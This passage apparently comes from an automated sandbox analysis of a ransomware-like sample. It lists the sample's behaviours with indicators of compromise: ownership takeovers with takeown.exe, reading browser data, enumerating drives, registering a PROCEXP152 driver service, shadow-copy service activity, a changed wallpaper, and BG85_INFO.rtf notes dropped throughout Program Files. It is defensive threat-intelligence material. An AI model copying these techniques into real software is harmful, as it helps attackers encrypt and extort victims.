1944 takeown.exe 820 takeown.exe 1828 takeown.exe 1132 takeown.exe 1672 takeown.exe 336 takeown.exe 1040 takeown.exe 1196 takeown.exe 1444 takeown.exe 1768 takeown.exe 1640 takeown.exe 932 takeown.exe 1796 takeown.exe 1608 takeown.exe 820 takeown.exe 1460 takeown.exe 2020 takeown.exe 336 takeown.exe 1268 takeown.exe 1120 takeown.exe 1400 takeown.exe 1664 takeown.exe 1196 takeown.exe 1064 takeown.exe 652 takeown.exe 1196 takeown.exe 604 takeown.exe 1064 takeown.exe 212 takeown.exe 268 takeown.exe 284 takeown.exe 1816 takeown.exe 932 takeown.exe 1460 takeown.exe 1548 takeown.exe 1916 takeown.exe 1796 takeown.exe 1608 takeown.exe 1944 takeown.exe 872 takeown.exe 1388 takeown.exe 1428 takeown.exe 996 takeown.exe 792 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 34 IoCs
description ioc Process File opened for modification C:\Users\Admin\Searches\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\Z1YRRYOY\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Public\Videos\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Public\Recorded TV\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Public\Documents\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Public\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\Music\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Public\Downloads\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\Documents\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\Videos\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Public\Libraries\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Public\Desktop\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\Links\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\JSOYQ5ME\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\DUF815Z1\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Public\Pictures\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Public\Music\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\YAUNGDT1\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\T: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\G: WSBgHpvp64.exe File opened (read-only) \??\P: WSBgHpvp64.exe File opened (read-only) \??\Z: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\V: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\U: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\S: WSBgHpvp64.exe File opened (read-only) \??\X: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\W: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\K: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\O: WSBgHpvp64.exe File opened (read-only) \??\Q: WSBgHpvp64.exe File opened (read-only) \??\Y: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\Q: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\G: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\A: WSBgHpvp64.exe File opened (read-only) \??\F: WSBgHpvp64.exe File opened (read-only) \??\N: WSBgHpvp64.exe File opened (read-only) \??\R: WSBgHpvp64.exe File opened (read-only) \??\Y: WSBgHpvp64.exe File opened (read-only) \??\P: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\H: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\N: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\I: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\E: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\K: WSBgHpvp64.exe File opened (read-only) \??\L: WSBgHpvp64.exe File opened (read-only) \??\M: WSBgHpvp64.exe File opened (read-only) \??\S: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\R: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\V: WSBgHpvp64.exe File opened (read-only) \??\W: WSBgHpvp64.exe File opened (read-only) \??\H: WSBgHpvp64.exe File opened (read-only) \??\Z: WSBgHpvp64.exe File opened (read-only) \??\J: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\F: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\X: WSBgHpvp64.exe File opened (read-only) \??\M: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\B: WSBgHpvp64.exe File opened (read-only) \??\E: WSBgHpvp64.exe File opened (read-only) \??\I: WSBgHpvp64.exe File opened (read-only) \??\J: WSBgHpvp64.exe File opened (read-only) \??\T: WSBgHpvp64.exe File opened (read-only) \??\U: WSBgHpvp64.exe File opened (read-only) \??\O: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\L: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe -
Modifies service 2 TTPs 11 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\Type = "1" WSBgHpvp64.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" WSBgHpvp64.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\Start = "3" WSBgHpvp64.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152 WSBgHpvp64.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152 WSBgHpvp64.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ErrorControl = "1" WSBgHpvp64.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\Q8ZLDLS1.bmp" reg.exe -
Drops file in Program Files directory 3068 IoCs
description ioc Process File created C:\Program Files\Java\jre7\lib\zi\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UTC c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.ja_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mru_on_win7.css c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\NetworkServerControl c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Tell_City c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\ReadOutLoud.api c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Zaporozhye c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Havana c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Scoresbysund c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Madeira c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Perth c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.STD c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Vienna c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.lucene.analysis_3.5.0.v20120725-1805.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Minsk c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh87 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Installer\chrome.7z c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\epl-v10.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs.zh_CN_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\EST5 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\cs.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Fakaofo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kuching c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.ibm.icu_52.1.0.v201404241930.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\QRCode.pmp c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_olv.css c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\VERSION.txt c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\jquery.jstree.js c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.ja_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dili c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightDemiItalic.ttf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Chisinau c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\license.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\bin\pack200.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Managua c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\AST4 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Paris c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfoInternal.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Knox c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-oql_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_cs.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaSansRegular.ttf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+8 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Perth c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\images\cursors\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Phoenix c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\topnav.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text_3.9.1.v20140827-1810.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-api-caching_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\COPYING.txt c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Extensions\external_extensions.json c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jmap.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Vincennes c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\MANIFEST.MF c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\zi\SystemV\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Mozilla Firefox\uninstall\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Guatemala c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt_3.103.1.v20140903-1938.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Campo_Grande c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Mauritius c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\lv.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\eclipse.inf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Funafuti c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\security\java.security c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\DataSet.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\local_policy.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Windows Mail\WinMail.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Tunis c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for 